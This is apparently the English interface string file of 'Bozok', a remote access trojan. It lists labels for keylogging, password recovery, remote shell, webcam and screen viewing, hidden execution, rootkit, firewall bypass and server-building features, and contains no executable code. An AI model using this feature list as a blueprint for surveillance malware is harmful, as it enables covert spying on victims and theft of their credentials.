[Main]
id=ID
ip=IP
username=Username
computername=Computername
os=OS
ver=Ver
plugin=Plugin
cam=Cam
idle=Idle
activewindow=Active Window
fileexplorer=File Explorer
registryeditor=Registry Editor
procman=Processmanager
windows=Windowsmanager
services=Servicemanager
remoteshell=Remote Shell
screenviewer=Screenviewer
camviewer=Camviewer
keylogger=Keylogger
passwordrecovery=Password Recovery
uploadextension=Upload Extension
server=Server
downloadexecute=Download&&Execute File
update=Update
localfile=Local File
closeserv=Close Server
restart=Restart
uninstall=Uninstall
opendownloadfolder=Open Download Folder
welcome=Welcome
welcomebozok=Welcome To Bozok
serverid=Server ID:
password=Password:
port=Port:
installserver=Install Server
filename=Filename:
visiblemode=Visible Mode
mutex=Mutex
startupserv=Startup Server
keyname=Keyname:
extensionname=Extension Name:
incextension=Include Extension
persistance=Persistance (PE-Version only)
firewallbypass=Firewall Bypass (PE-Version only)
requestuac=Request UAC Elevation (PE-Version only)
rootkit=Enable Rootkit (PE-Version only)
output=Output Name:
build=Build
connection=Connection
installation=Installation
startup=Startup
extension=Extension
security=Security
additional=Additional
addip=Add Connection
delip=Delete Connection
listenport=Listen on Port:
autouploadplugin=Auto-Upload Plugin
autostartscreen=Auto-Start Screen
save=Save
files=Files
transfer=Transfer
filesearch=File Search
name=Name
size=Size
refresh=Refresh
downloadfile=Download File
downloadfolder=Download Folder
uploadfile=Upload File
newfolder=New Folder
execute=Execute
executevisible=Execute Visible
executehidden=Execute Hidden
rename=Rename
copyfile=Copy File
pastefile=Paste File
delete=Delete
canceltransfer=Cancel Transfer
delqueue=Delete from Queue
executefile=Execute File
clear=Clear
filname=Filename
status=Status
searchpath=Path:
searchmask=Search:
search=Search
path=Path
memory=Memory
threads=Threads
terminate=Terminate
terminatedelete=Terminate && Delete File
handle=Handle
minimize=Minimize
maximize=Maximize
close=Close
description=Description
startservice=Start Service
stopservice=Stop Service
settings=Settings
quality=Quality:
saveframes=Save Frames
remotecontrol=Remote Control
source=Source
sizec=Size:
key=Key
type=Type
value=Value
getkeylog=Get Keylog
clearkeylog=Clear Keylog
savekeylog=Save Keylog
activate=Activate
send=Send
testip=Test Connection
provurl=Please provide link (with http://):
copyerr=Cant copy stub.exe to server.exe!
finderr=Cant find stub.exe!
typeip=Please type your IP
validiperr=Please use a valid IP/DNS!
validlinkerr=Provide valid link!
notlistening=Not listening...
listeninport=Listening on port: 
audiocap=Audio Capture
